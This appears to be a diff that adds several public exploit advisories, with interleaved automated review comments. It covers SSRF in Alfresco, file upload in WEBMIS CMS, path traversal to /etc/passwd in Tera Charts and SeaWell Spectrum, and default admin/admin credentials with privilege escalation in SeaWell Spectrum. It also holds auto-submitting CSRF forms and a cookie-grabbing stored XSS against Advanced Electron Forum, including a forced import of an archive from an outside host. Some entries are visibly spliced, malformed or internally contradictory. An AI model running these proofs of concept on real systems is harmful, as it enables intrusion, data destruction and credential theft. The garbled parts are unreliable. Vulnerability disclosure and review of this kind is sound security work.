||||
http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port
|
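Review bot: the first line is spliced: `source: http://www.securityfocus.com/bid/68` runs straight into the PoC URL and a dangling `663/info` fragment, so neither the BID reference nor the source link is usable as written; restore the source line in the form used by 39255.html (`source: http://www.securityfocus.com/bid/<id>/info`) and keep the PoC URL on its own line. The body also only says "multiple security vulnerabilities" and never names the `/proxy` endpoint or its `endpoint` parameter, which is the one thing this entry is about.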
9
platforms/multiple/remote/39259.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/68http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
|
||||
|
||||
Alfresco Community Edition is prone to multiple security vulnerabilities.
|
||||
|
||||
An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.
|
||||
|
||||
Alfresco Community Edition 4.2.f and earlier are vulnerable.
|
||||
|
||||
http://www.example.com/alfresco/cmisbrowser?url=http://internal_system:port
|
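Review bot: the first seven lines are identical to 39258.txt, including the same spliced `source:` line; only the last URL differs (`/cmisbrowser?url=` here, `/proxy?endpoint=` there). If the two SSRF vectors stay as separate entries, each file should describe its own endpoint and parameter instead of the shared generic text, otherwise fold them into one advisory.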
16
platforms/php/webapps/39255.html
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/68658/info
|
||||
|
||||
WEBMIS CMS is prone to a vulnerability that lets attackers upload arbitrary files.
|
||||
|
||||
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
|
||||
|
||||
<form
|
||||
action="http://www.example.com/webmis_installation/plugin/uploadify/uploadify.php"
|
||||
method="post"
|
||||
enctype="multipart/form-data">
|
||||
<label for="file">Filename:</label>
|
||||
<input type="file" name="Filedata" ><br>
|
||||
<input type=text name="path" value="/webmis_installation/plugin/">
|
||||
<input type=text name="someKey" value="someValue"]>
|
||||
<input type="submit" name="submit" value="Submit">
|
||||
</form>
|
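Review bot: the form markup is malformed: `<input type=text name="someKey" value="someValue"]>` has a stray `]` before the closing bracket, and both `type=text` attributes are unquoted while every other attribute in the file is quoted. The `someKey`/`someValue` pair is a placeholder that the text never explains; either state what uploadify.php expects there or drop the input. The `<label for="file">` also points at an id that no input declares (the file input is only named `Filedata`).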
10
platforms/php/webapps/39256.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/68662/info
|
||||
|
||||
Tera Charts plugin for WordPress is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit these issues to obtain potentially sensitive information; other attacks are also possible.
|
||||
|
||||
Tera Charts 0.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd
|
||||
http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd
|
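Review bot: the last two lines are a verbatim duplicate of the same `treemap.php?fn=` URL, so the hunk header's `+10` count includes a repeat; drop one. The description ("multiple local file-include vulnerabilities") also disagrees with the files.csv title for 39256 ("Remote Path Traversal File Disclosure"); settle on one classification.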
9
platforms/php/webapps/39257.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/68662/info
|
||||
|
||||
Tera Charts plugin for WordPress is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit these issues to obtain potentially sensitive information; other attacks are also possible.
|
||||
|
||||
Tera Charts 0.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wp_test/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
|
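Review bot: this file repeats 39256.txt word for word and differs only in the script name (`zoomabletreemap.php` vs `treemap.php`) and the placeholder install path (`wp_test` here, `wordpress_vuln_check` there); either merge the two into one advisory that lists both scripts, or at least use the same placeholder path in both so they read as one finding.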
180
platforms/php/webapps/39261.txt
Executable file
|
@ -0,0 +1,180 @@
|
|||
[+] Credits: hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-CSRF.txt
|
||||
|
||||
|
||||
Vendor:
|
||||
=============================
|
||||
www.anelectron.com/downloads/
|
||||
|
||||
|
||||
Product:
|
||||
====================================
|
||||
Advanced Electron Forum v1.0.9 (AEF)
|
||||
Exploit patched current version.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
CSRF
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
In Admin panel no CSRF protections exist in multiple areas allowing remote
|
||||
attackers to make HTTP request on behalf of the victim if they
|
||||
currently have a valid session (logged in) and visit or click an infected
|
||||
link, resulting in some of the following destructions.
|
||||
|
||||
0x01: Change current database settings
|
||||
|
||||
0x02: Delete all Inbox / Sent Emails
|
||||
|
||||
0x03: Delete all 'shouts'
|
||||
|
||||
0x04: Delete all Topics
|
||||
|
||||
by the way, edit profile, avatar and more all seem vulnerable as well..
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
CSRF 0x01:
|
||||
|
||||
change mysql db settings
|
||||
note: however you will need to know or guess the database name.
|
||||
|
||||
<form id="DOOM" accept-charset="ISO-8859-1" action="
|
||||
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=conpan&seadact=mysqlset"
|
||||
method="post" name="mysqlsetform">
|
||||
<input type="hidden" name="server" value="hyp3rlinx.altervista.org" />
|
||||
<input type="hidden" name="user" value="hyp3rlinx" />
|
||||
<input type="hidden" name="password" value="DESTROYED" />
|
||||
<input type="hidden" name="database" value="AEF" />
|
||||
<input type="hidden" name="dbprefix" value="aef_" />
|
||||
<script>document.getElementById('DOOM').submit()</script>
|
||||
</form>
|
||||
|
CSRF 0x02:

Delete all Inbox / Sent emails...

<iframe name="demonz" style="display:none" name="hidden-form"></iframe>

<form id="DESTRUCT" target="demonz" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=sentitems"
method="post">
<input type="hidden" id="sent" name="list[]" />
<input type="hidden" name="deleteselsent" value="Delete+Selected" />
</form>

<form id="DOOM" target="demonz" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=inbox"
method="post">
<input type="hidden" id="inbox" name="list[]" />
<input type="hidden" name="deleteselinbox" value="Delete+Selected" />
</form>

<script>
//Sent Email IDs seem to be stored using even numbers 2,4,6 etc...
//Inbox Email IDs seem to use odd numbers
var c=-1
var uwillsuffer;
var amttodelete=10000
var inbox=document.getElementById("inbox")
var outbox=document.getElementById("sent")

function RUIN_EVERYTHING(){
c++
//Inbox IDs are even numbered Sent are odd.
if(c % 2 == 0){
arguments[3].value=c
document.getElementById(arguments[1]).submit()
}else{
arguments[2].value=c
document.getElementById(arguments[0]).submit()
}
if(c>=amttodelete){
clearInterval(uwillsuffer)
alert("Done!")
}
}
uwillsuffer = setInterval(RUIN_EVERYTHING, 1000, "DOOM", "DESTRUCT", inbox,
outbox)
</script>



CSRF 0x03:

Delete all 'Shouts'

<form accept-charset="ISO-8859-1" id="SPECTOR_OF_HATE" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=conpan&seadact=shoutboxset"
method="post">
<input type="hidden" name="shouts" value="10" />
<input type="hidden" name="shoutboxtime" value="1440" />
<input type="hidden" name="shoutbox_emot" value="on" />
<input type="hidden" name="shoutbox_nbbc" value="on" />
<input type="hidden" name="truncatetable" value="on" />
<input type="hidden" name="delallshouts" value="Delete" />
<script>document.getElementById('SPECTOR_OF_HATE').submit()</script>
</form>


CSRF 0x04:

Delete all 'Topics' via simple GET request, this will delete topics 1 thru
7...

http://localhost/AEF(1.0.9)_Install/index.php?act=deletetopic&topid=7,6,5,4,3,2,1


Disclosure Timeline:
=======================================
Vendor Notification: NA
January 17, 2016 : Public Disclosure



Exploitation Technique:
======================
Remote


Severity Level:
================
High


Description:
===================================================================
Request Method(s): [+] POST / GET


Vulnerable Product: [+] AEF v1.0.9 (exploit patched version)


===================================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
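Review bot: the two JS comments in CSRF 0x02 contradict each other about which folder uses which ID parity ("Sent Email IDs seem to be stored using even numbers" / "Inbox Email IDs seem to use odd numbers" at the top of the script versus "Inbox IDs are even numbered Sent are odd." inside RUIN_EVERYTHING); keep one statement so the PoC documents what it actually submits. From the defender's side the hunk shows the root cause clearly: all three endpoints (usercp deleteselsent/deleteselinbox, conpan delallshouts, act=deletetopic) accept a state-changing request with no per-session anti-CSRF token, and CSRF 0x04 performs a delete over a plain GET. The fix is a token validated on every state-changing action plus rejecting GET for deletes, after which these three forms serve as a regression test.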
139
platforms/php/webapps/39262.txt
Executable file
@ -0,0 +1,139 @@
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-XSS.txt


Vendor:
=============================
www.anelectron.com/downloads/


Product:
====================================
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.


Vulnerability Type:
===================
Persistent XSS


CVE Reference:
==============
N/A


Vulnerability Details:
=====================

In Admin panel under Edit Boards / General Stuff / General Options

There is an option to sepcify a redirect URL for the forum.

See --> Redirect Forum:
Enter a URL to which this forum will be redirected to.

The redirect input field is vulnerable to a persistent XSS that will be
stored in the MySQL database
and execute attacker supplied client side code each time a victim visits
the following URLs.

http://localhost/AEF(1.0.9)_Install/index.php?

http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=forums&seadact=editforum&editforum=1



Exploit code(s):
===============

Persistent XSS

<form id="XSS-DE-PERSISTO" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=forums&seadact=editforum&editforum=1"
method="post">
<input type="hidden" name="editmother" value="c1" />
<input type="hidden" name="forder" value="1" />
<input type="hidden" name="fstatus" value="1" />
<input type="hidden" name="fredirect" value='"/><script>alert("XSS
hyp3rlinx \n\n" + document.cookie)</script>' />
<input type="hidden" name="fimage" value="" />
<input type="hidden" name="fname" value="Generals" />
<input type="hidden" name="fdesc" value="hyp3rlinx" />
<input type="hidden" name="ftheme" value="0" />
<input type="hidden" name="frulestitle" value="MAYHEM" />
<input type="hidden" name="frules" value="0" />
<input type="hidden" name="rss" value="10" />
<input type="hidden" name="rss_topic" value="0" />
<input type="hidden" name="member[-1]" value="on" />
<input type="hidden" name="member[0]" value="on" />
<input type="hidden" name="member[3]" value="on" />
<input type="hidden" name="inc_mem_posts" value="on" />
<input type="hidden" name="allow_poll" value="on" />
<input type="hidden" name="allow_html" value="on" />
<input type="hidden" name="mod_posts" value="on" />
<input type="hidden" name="editboard" value="Edit+Forum" />
<script>document.getElementById('XSS-DE-PERSISTO').submit()</script>
</form>



Some other misc XSS(s) under 'Signature' area.


http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=signature
on Anchor link setting
http://"onMouseMove="alert(0)

AND

http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=writepm
email link:
mailto:"onMouseMove="alert(1)



Disclosure Timeline:
=====================================
Vendor Notification: NA
January 17, 2016 : Public Disclosure


Exploitation Technique:
=======================
Remote


Severity Level:
================
High


Description:
=================================================================


Request Method(s): [+] POST


Vulnerable Product: [+] AEF v1.0.9 (exploit patched version)


Vulnerable Parameter(s): [+] 'fredirect'

=================================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
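Review bot: the Description block lists only 'fredirect' under Vulnerable Parameter(s), but the hunk also reports two further stored injection points (the anchor link on ucpact=signature and the email link on ucpact=writepm); either add those fields to the parameter list or say they are unnamed. "sepcify" in Vulnerability Details is a typo. Note also that the PoC reaches the admin edit-forum form cross-site with no token, so the stored XSS is deliverable through CSRF; the fix the hunk implies is attribute-context output encoding of fredirect (and the link fields, where a quote must not be able to close the href attribute) together with a CSRF token on seadact=editforum.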
113
platforms/php/webapps/39263.txt
Executable file
@ -0,0 +1,113 @@
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-RFI.txt



Vendor:
=============================
www.anelectron.com/downloads/



Product:
================================
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.


Vulnerability Type:
============================
Remote File Inclusion / CSRF



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

In Admin control panel there is option to Import Skins and one choice is
using a web URL.

From AEF:

"Specify the URL of the theme on the net. The theme file must be a
compressed archive (zip, tgz, tbz2, tar)."

However there is no CSRF token or check made that this is a valid request
made by the currently logged in user, resulting
in arbitrary remote file imports from an attacker if the user visits or
clicks an malicious link. Victims will then be left
open to arbitrary malicious file downloads from anywhere on the net which
may be used as a platform for further attacks...



Exploit code(s):
===============

<form id="EL-DOWNLOADO" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=skin&seadact=import"
method="post">
<input type="hidden" name="folderpath" value="../" />
<input type="hidden" name="importtype" value="2" />
<input type="hidden" name="weburl" value="
http://hyp3rlinx.altervista.org/evil.zip" />
<input type="hidden" name="filepath" value="../" />
<input type="hidden" name="uploadtheme" value="" />
<input type="hidden" name="importskin" value="Import" />
<script>document.getElementById('EL-DOWNLOADO').submit()</script>
</form>



Disclosure Timeline:
======================================
Vendor Notification: NA
January 17, 2016 : Public Disclosure



Exploitation Technique:
=======================
Remote



Severity Level:
===============
High



Description:
==================================================================


Request Method(s): [+] POST


Vulnerable Product: [+] Advanced Electron Forum v1.0.9 (AEF)



==================================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
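Review bot: the Vulnerability Type header says "Remote File Inclusion / CSRF", but nothing in the details or the PoC shows the fetched archive being included or executed; what the hunk actually documents is a CSRF against seadact=import that makes the logged-in admin's session download an archive from an attacker-chosen weburl. Classify it as CSRF leading to arbitrary theme-archive import, or add the step that turns the import into inclusion. The folderpath and filepath inputs are set to "../" yet never mentioned in the write-up; document what they are for or leave them at the form's defaults. The defensive fix visible from the request is a per-session anti-CSRF token on the import action and server-side validation of weburl (scheme and host allow-list).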
105
platforms/php/webapps/39266.txt
Executable file
@ -0,0 +1,105 @@
# Exploit Title: [SeaWell Networks Spectrum - Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [http://www.seawellnetworks.com/spectrum/]
# Versions Reported: [Spectrum SDC 02.05.00, Build 02.05.00.0016]

CVE-ID:
CVE-2015-8282
CVE-2015-8283
CVE-2015-8284

About SeaWell Networks Spectrum

Session Delivery Control

SeaWell set out to improve the way operators control, monetize and scale their IP video offerings, to meet the growing subscriber demands for video delivered to smartphones, tablets and game consoles.

The result – Spectrum – is what we call a “Multiscreen 2.0” Session Delivery Controller.

Spectrum is high-performance, carrier-grade software that takes ABR video and repackages it – on-the-fly – into any other protocol, including Apple HLS, Adobe HDS, Microsoft Smooth Streaming and MPEG-DASH.

http://www.seawellnetworks.com/spectrum/

Affected version
Spectrum SDC 02.05.00
Build 02.05.00.0016
Copyright (c) 2015 SeaWell Networks Inc.

A. CWE-255: Credentials Management
CVE-2015-8282

Weak, default login credentials - admin / admin

B. CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVE-2015-8283

The configure_manage.php module accepts a file parameter which takes an unrestricted file path as input, allowing an attacker (non-admin, low- privileged user) to read arbitrary files on the system.

PoC:

https://IP/configure_manage.php?action=download_config&file=../../../../../../../../../etc/passwd

C. CWE-285: Improper Authorization
CVE-2015-8284

A low privileged, non-admin user, with only viewer privileges, can perform administrative functions, such as create, update, delete a user (including admin user), or access device's configuration files (policy.xml, cookie_config.xml, systemCfg.xml). The application lacks Authorization controls to restrict any non-admin users from performing admin functions.

The application users can have admin or viewer privilege levels. Admin has full access to the device. Viewer has access to very restricted functions.

It is possible for a viewer priv user to perform admin functions.

PoC:

Add new user [Admin function only]

GET /system_manage.php?username=viewer&password=viewer&password=viewer&userlevel=1&action=add_user&ekey=&LActiveRow= HTTP/1.1

https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=

Here

admin -> userlevel=9
viewer -> userlevel=1

Create new user with Admin privs
Log in as viewer - try create new admin user - viewer1

https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=

<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>

Delete user

https://IP/system_manage.php?username=viewer1&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4

Modify existing user (including admin)
log in as viewer - try change system (admin) user

https://IP/system_manage.php?username=system&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4

<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>

Change Admin password
log in as viewer - try change admin pass

https://IP/system_manage.php?username=admin&password=admin1&password=admin1&userlevel=9&action=update_user&ekey=3&LActiveRow=sys_Luser_3

<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>

Downloading configuration xml files

viewer priv user has no access/option to config xmls via GUI. It is possible to download the configs by calling the url directly

Access policy config xml
https://IP/configure_manage.php?action=download_config&file=policy.xml

Access cookie config xml
https://IP/configure_manage.php?action=download_config&file=cookie_config.xml

Access system config xml
https://IP/configure_manage.php?action=download_config&file=systemCfg.xml

+++++
--
Best Regards,
Karn Ganeshen
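Review bot: several PoC blocks in section C do not match their headings. Under "Add new user" the first request (username=viewer, userlevel=1) creates a viewer-level account while the heading calls it an admin-only function, and the URL that follows it duplicates the one under "Create new user with Admin privs"; under "Modify existing user (including admin)" the request uses action=delete_user rather than update_user, whereas the "Change Admin password" block correctly uses update_user. Align each request with its heading so the advisory can be reproduced. On mitigation: for B, configure_manage.php should resolve the file parameter against the configuration directory and reject any result outside it rather than filtering "../"; for C, the userlevel check must be enforced server-side on every system_manage.php and configure_manage.php action, since the advisory itself notes the viewer has no GUI option yet the direct URL succeeds.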
66
platforms/windows/local/39260.txt
Executable file
@ -0,0 +1,66 @@

WEG SuperDrive G2 v12.0.0 Insecure File Permissions


Vendor: WEG Group
Product web page: http://www.weg.net
Affected version: SuperDrive G2 (v12.0.0 Build 20150930-J1.8.0_60-NB8.0.2)
SuperDrive (v7.0.0)

Summary: SuperDrive is a Windows graph tool for parameter setting,
control and monitor of WEG Drives. It permits to edit directly in the
drive online parameters, or to edit offline parameter files stored
in the microcomputer. It enables you to store parameters of all drives
that exist in the installation. The software also incorporates functions
enable the upload to the drive of the microcomputer parameters sets
as well as the download from the drive to the microcomputer. The
communication between drive and microcomputer is realized via RS232
serial interface (point to point) or by RS485 for network linkage.

Desc: SuperDrive suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user that can change the
executable file with a binary of choice. The vulnerability exist due
to the improper permissions, with the 'C' flag (Change) for 'Authenticated
Users' group.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Java 1.8.0_60


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5294
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5294.php


25.11.2015

--


C:\WEG\SuperDrive 7.0.0>cacls SuperDrive.exe
C:\WEG\SuperDrive 7.0.0\SuperDrive.exe BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
BUILTIN\Users:R
NT AUTHORITY\Authenticated Users:C


C:\WEG\SuperDrive 7.0.0>


C:\WEG\SuperDrive G2 12.0.0>cacls *.exe
C:\WEG\SuperDrive G2 12.0.0\SuperDriveG2.exe BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
BUILTIN\Users:R
NT AUTHORITY\Authenticated Users:C

C:\WEG\SuperDrive G2 12.0.0\unins000.exe BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
BUILTIN\Users:R
NT AUTHORITY\Authenticated Users:C


C:\WEG\SuperDrive G2 12.0.0>
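Review bot: the title names only SuperDrive G2 v12.0.0, but "Affected version" and the first cacls listing also cover SuperDrive v7.0.0; widen the title (and the index entry) to both. The bare line "25.11.2015" carries no label, so it is unclear whether it is the discovery date or a vendor-contact date; a short timeline would fix that. The cacls output documents the defect itself: "NT AUTHORITY\Authenticated Users:C" on SuperDrive.exe, SuperDriveG2.exe and unins000.exe means any authenticated user may overwrite a binary that an administrator later launches. The fix belongs in the installer (grant Authenticated Users read and execute only, leaving Change/Full to Administrators and SYSTEM), and an administrator can confirm the repair by re-running the same cacls commands shown above.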